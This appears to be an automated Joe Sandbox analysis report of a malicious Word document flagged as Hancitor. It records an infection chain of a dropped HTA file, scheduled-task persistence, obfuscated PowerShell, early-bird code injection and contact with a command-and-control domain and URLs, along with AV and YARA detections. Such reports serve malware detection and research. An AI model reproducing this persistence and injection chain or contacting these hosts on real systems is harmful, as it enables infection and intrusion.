Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 64199 Sample: 18#U042f.doc Startdate: 17/11/2018 Architecture: WINDOWS Score: 100 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Antivirus detection for submitted file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 8 other signatures 2->52 8 mshta.exe 2->8         started        11 WINWORD.EXE 428 29 2->11         started        process3 file4 54 Obfuscated command line found 8->54 56 PowerShell case anomaly found 8->56 14 cmd.exe 1 8->14         started        42 C:\Users\user\AppData\Roaming\WPFT532.hta, data 11->42 dropped 58 Document exploit detected (process start blacklist hit) 11->58 16 schtasks.exe 1 11->16         started        18 schtasks.exe 1 11->18         started        20 schtasks.exe 1 11->20         started        22 2 other processes 11->22 signatures5 process6 process7 24 cmd.exe 1 14->24         started        27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        35 conhost.exe 22->35         started        signatures8 60 Early bird code injection technique detected 24->60 62 PowerShell case anomaly found 24->62 37 powershell.exe 14 29 24->37         started        40 cmd.exe 1 24->40         started        process9 dnsIp10 44 findupdatems.com 37->44

Simulations

Behavior and APIs

TimeTypeDescription
23:00:12API Interceptor3x Sleep call for process: WINWORD.EXE modified
23:00:15API Interceptor1123x Sleep call for process: splwow64.exe modified
23:00:34Task SchedulerRun new task: DriveCloudTaskCoreCheck path: mshta s>C:\Users\user\AppData\Roaming\WPFT532.hta

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
18#U042f.doc61%virustotalBrowse
18#U042f.doc100%AviraW97M/Hancitor.hwhzo

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
findupdatems.com0%virustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://findupdatems.com0%virustotalBrowse
http://findupdatems.com0%Avira URL Cloudsafe
http://findupdatems.com/check/index0%virustotalBrowse
http://findupdatems.com/check/index0%Avira URL Cloudsafe
http://findupdatems.com/ch0%Avira URL Cloudsafe
http://findupdatems.com/check/indexd0%Avira URL Cloudsafe
http://www.microsoft.c0%Avira URL Cloudsafe
http://findupdatems.com/check/indexHlj)4jzIEX$0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000007.00000002.2369970087.058E0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
0000000C.00000002.2380851729.06F8A000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
0000000C.00000003.2186142865.005BA000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000007.00000002.2365632769.00600000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000007.00000002.2365595933.005DE000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
0000000C.00000002.2374595497.00910000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.